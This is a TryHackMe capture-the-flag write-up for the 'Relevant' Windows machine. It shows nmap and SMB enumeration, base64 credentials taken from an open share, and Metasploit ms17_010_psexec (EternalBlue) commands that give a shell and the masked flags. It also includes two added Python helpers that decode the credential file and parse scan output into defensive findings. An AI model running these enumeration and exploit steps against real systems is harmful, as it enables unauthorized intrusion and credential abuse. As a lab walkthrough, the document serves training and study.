TryHackMe | Relevant Write up

edbert sumicad
4 min read, May 5, 2022


Attacking a Windows machine through the EternalBlue vulnerability (MS17-010), using the Metasploit method.

Attack Summary:

  • Search for open ports; I highly suggest scanning all ports with the nmap -p- option.
  • Use the Nmap Scripting Engine to identify vulnerabilities in the open ports, especially 445/SMB.
  • Log in to the non-default SMB share and download the base64-encoded credentials.
  • From Metasploit, use the ms17_010_psexec exploit together with the credentials.
  • Gain a user shell, enumerate further with winPEAS, and escalate privileges once you find a vulnerability.

Enumeration

└─# nmap -sV -T4 -iL ip.txt| tee nmap.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-03 22:36 EDT
Nmap scan report for 10.10.23.238
Host is up (0.28s latency).
Not shown: 995 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.81 seconds

Port 80:

Microsoft IIS Default page.

Port 445:

Checking for SMB shares using the Nmap Scripting Engine.

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse $IP

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.23.238\ADMIN$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.23.238\C$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.23.238\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: <none>
|     Current user access: READ/WRITE
|   \\10.10.23.238\nt4wrksv:
|     Type: STYPE_DISKTREE
|     Comment:
|     Anonymous access: <none>
|_    Current user access: READ/WRITE

We found a non-default share, nt4wrksv. Let’s try to log in and see what we can get.

smbclient -U nt4wrksv //10.10.121.37/nt4wrksv

It seems that we’re able to log in.

Download the passwords.txt file.

The contents of passwords.txt are base64-encoded.

└─# cat passwords.txt        
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk

Let’s decode them first.

Qm9iIC0gIVBAJCRXMHJEITEyMw==
Bob - !P@$$W0rD!123
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
Bill - Juw4nnaM4n420696969!$$$
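The point to take from this file is that base64 is an encoding, not a protection: anyone who can read the share can recover the passwords. As an added example (not part of the write-up), the following Python decodes a file in the same "[header] + one base64 line per entry" layout, splits each entry into its user and secret, and keeps lines that are not valid base64 or not in the expected "user - secret" form in a separate rejected list instead of silently dropping them. The embedded file contents are a constructed copy of the two lines shown above.

```python
import base64
import binascii

# Constructed copy of the passwords.txt contents shown in the write-up.
PASSWORDS_TXT = """[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
"""


def decode_credential_file(text):
    """Return (entries, rejected) for a '[header]' + base64-per-line file.

    entries  -> list of (user, secret) tuples in file order
    rejected -> list of (line number, raw line, reason) for lines that are
                not valid base64 or do not decode to 'user - secret'
    """
    entries, rejected = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith('['):
            continue  # skip blank lines and the [section] header
        try:
            # validate=True refuses non-alphabet characters instead of
            # silently discarding them, so junk lines are reported.
            decoded = base64.b64decode(line, validate=True).decode('utf-8')
        except (binascii.Error, UnicodeDecodeError) as exc:
            rejected.append((lineno, line, str(exc)))
            continue
        user, sep, secret = decoded.partition(' - ')
        if not sep or not user or not secret:
            rejected.append((lineno, line, 'no "user - secret" layout'))
            continue
        entries.append((user, secret))
    return entries, rejected


if __name__ == '__main__':
    found, bad = decode_credential_file(PASSWORDS_TXT)
    for user, _secret in found:
        print(f'recovered credential for user {user!r} from a world-readable share')
    for lineno, _line, reason in bad:
        print(f'line {lineno}: rejected ({reason})')
```

Run as a script it lists only the usernames, which is what you would put in a finding; the tuple returned by the function carries the secrets for whoever needs to rotate them.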

Now, what’s next?

Let’s go back to our nmap scan.

445/tcp  open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds

Notice that the server is reported as Microsoft Windows Server 2008 R2 - 2012; it’s probably a Windows 7-era OS.

So it is worth checking for the EternalBlue vulnerability with the Nmap Scripting Engine script smb-vuln-ms17-010.nse.

└─# nmap -p 445 --script=smb-vuln-ms17-010.nse -iL ip.txt| tee nmapEBlue.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-04 02:24 EDT
Nmap scan report for 10.10.218.219
Host is up (0.27s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 4.39 seconds
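The two NSE outputs above (smb-enum-shares and smb-vuln-ms17-010) are the same text a defender reads after an internal scan, so it is worth being able to pull the actionable findings out of them mechanically. As an added example that is not part of the write-up, here is a small Python parser that walks the `| ` / `|_ ` script gutter, records which account the share enumeration ran as, the type and access level of each share, and whether the MS17-010 check reported State: VULNERABLE together with the CVE ids it lists. The audit function then reports only what matters: disk shares (STYPE_DISKTREE*) writable by that account, and an unpatched SMBv1 host. The sample input is a constructed, condensed copy of the outputs shown above.

```python
import re

# Constructed sample input: the smb-enum-shares and smb-vuln-ms17-010
# output from this write-up, condensed to the lines the parser reads.
NSE_OUTPUT = r"""Nmap scan report for 10.10.23.238
Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.23.238\ADMIN$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Current user access: <none>
|   \\10.10.23.238\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Current user access: READ/WRITE
|   \\10.10.23.238\nt4wrksv:
|     Type: STYPE_DISKTREE
|_    Current user access: READ/WRITE
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_    Risk factor: HIGH
"""

# Matches a UNC share header line such as \\10.10.23.238\nt4wrksv:
SHARE_RE = re.compile(r'\\\\[^\\]+\\([^:]+):$')


def parse_smb_scripts(text):
    """Parse Nmap SMB script output into a dict with:
    account_used -> account the share enumeration ran as
    shares       -> {share name: {'type': ..., 'access': ...}}
    ms17_010     -> True when smb-vuln-ms17-010 reports State: VULNERABLE
    cves         -> CVE ids listed under that vulnerability
    """
    out = {'account_used': None, 'shares': {}, 'ms17_010': False, 'cves': []}
    section, share = None, None
    for raw in text.splitlines():
        line = raw.lstrip('|_ ').strip()  # drop the NSE '| ' / '|_ ' gutter
        if line.startswith('smb-enum-shares:'):
            section = 'shares'
        elif line.startswith('smb-vuln-ms17-010:'):
            section = 'vuln'
        elif section == 'shares':
            m = SHARE_RE.match(line)
            if m:
                share = m.group(1)
                out['shares'][share] = {'type': None, 'access': None}
            elif line.startswith('account_used:'):
                out['account_used'] = line.split(':', 1)[1].strip()
            elif share and line.startswith('Type:'):
                out['shares'][share]['type'] = line.split(':', 1)[1].strip()
            elif share and line.startswith('Current user access:'):
                out['shares'][share]['access'] = line.split(':', 1)[1].strip()
        elif section == 'vuln':
            if re.match(r'State:\s*VULNERABLE', line):
                out['ms17_010'] = True
            out['cves'].extend(re.findall(r'CVE-\d{4}-\d+', line))
    return out


def audit_findings(parsed):
    """Reduce the parsed output to the findings a defender acts on:
    disk shares writable by the enumeration account, and unpatched SMBv1.
    IPC$ is a named-pipe share (STYPE_IPC*), so it is not reported here."""
    findings = []
    for name, info in parsed['shares'].items():
        is_disk = (info['type'] or '').startswith('STYPE_DISKTREE')
        if is_disk and 'WRITE' in (info['access'] or ''):
            findings.append(f"disk share {name} is writable as '{parsed['account_used']}'")
    if parsed['ms17_010']:
        findings.append('SMBv1 unpatched for MS17-010 (' + ', '.join(parsed['cves']) + ')')
    return findings


if __name__ == '__main__':
    for finding in audit_findings(parse_smb_scripts(NSE_OUTPUT)):
        print('FINDING:', finding)
```

Feeding it the full `nmap -oN` file instead of the condensed sample works the same way, because lines outside the two script blocks are ignored until a matching header is seen.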

Upon confirming that it is vulnerable, we can use the windows/smb/ms17_010_psexec exploit module from Metasploit.

use windows/smb/ms17_010_psexec
set RHOSTS 10.10.101.252
set LHOST tun0
set SMBUSER Bob
set SMBPASS !P@$$W0rD!123

Then we get a shell. Let’s grab user.txt.

meterpreter> shell
C:\Users\Bob\Desktop>type user.txt
THM{fdk4ka34vk34***************}

Upload winpeas.exe to the Temp folder for further enumeration and to look for other vulnerabilities to use for privilege escalation.

https://github.com/carlospolop/PEASS-ng/releases

Okay, let’s execute. :D

As we can see here, we already have administrator privileges, so let’s go and get the root.txt flag.

C:\Users\Administrator\Desktop>type root.txt
type root.txt
THM{1fk5kf469devly1gl**********}

Thank you for taking the time to read; I hope you find this one helpful. :D

If you have any suggestions, feel free to comment or message me on LinkedIn.


Written by edbert sumicad

Cybersecurity Analyst | Penetration Tester | CTF Player